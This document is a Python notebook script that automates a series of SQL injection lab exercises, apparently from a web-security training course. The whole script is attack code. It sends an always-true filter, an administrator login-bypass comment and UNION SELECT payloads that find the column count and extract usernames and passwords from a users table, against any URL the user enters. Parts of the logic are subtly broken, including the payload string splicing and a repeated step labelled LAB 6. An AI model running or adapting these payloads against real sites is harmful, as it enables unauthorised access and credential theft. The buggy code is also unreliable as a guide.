In [ ]:
import requests
import re

def check_sql_injection(url, payload):
    response = requests.get(url + payload)
    return response.text

def find_column_count(url):
    payload = "+UNION+SELECT+NULL"
    column_count = 0

    while True:
        response = check_sql_injection(url, payload)
        if "Internal Server Error" in response:
            break
        column_count += 1
        payload += ",NULL"
    
    return column_count

def find_text_column(url, column_count):
    payload = "+UNION+SELECT+" + ",".join(["NULL"] * column_count)

    for i in range(column_count):
        payload = payload[:9 + i * 5] + "'abcdef'" + payload[9 + i * 5 + 7:]
        response = check_sql_injection(url, payload)
        if "Internal Server Error" not in response:
            return i + 1
    
    return -1

def retrieve_data(url, column_count, text_column):
    payload = "+UNION+SELECT+'abc','def'"

    if text_column == -1:
        payload = "+UNION+SELECT+username,+password+FROM+users--"
    else:
        payload = "+UNION+SELECT+NULL," + "username||'~'||password+FROM+users--"

    response = check_sql_injection(url, payload)
    data = response.split('\n')[column_count].split('~')
    return data

def extract_additional_items(response):
    # Extract additional items based on a specific pattern or criteria
    pattern = r'<item>(.*?)</item>'
    additional_items = re.findall(pattern, response)
    return additional_items

def process_additional_items(response):
    additional_items = extract_additional_items(response)
    print("Additional Items:", additional_items)

def process_login_bypass(response):
    if "Login Successful" in response:
        print("Login Bypass Successful")
    else:
        print("Login Bypass Failed")

def process_retrieved_data(data):
    #Print the retrieved data
    for item in data:
        print(item)

def solve_sql_injection(url):
    # LAB 1: SQL injection vulnerability in WHERE clause
    payload = "'+OR+1=1--"
    response = check_sql_injection(url, payload)
    process_additional_items(response)

    # LAB 2: SQL injection vulnerability allowing login bypass
    payload = "administrator'--"
    response = check_sql_injection(url, payload)
    process_login_bypass(response)

    # LAB 3: SQL injection UNION attack, determining the number of columns
    column_count = find_column_count(url)

    # LAB 4: SQL injection UNION attack, finding a column containing text
    text_column = find_text_column(url, column_count)

    # LAB 5: SQL injection UNION attack, retrieving data from other tables
    data = retrieve_data(url, column_count, text_column)
    process_retrieved_data(data)

    # LAB 6: SQL injection UNION attack, retrieving multiple values in a single column
    data = retrieve_data(url, column_count, text_column)
    process_retrieved_data(data)

url = input("Enter the URL HERE: ")
solve_sql_injection(url)
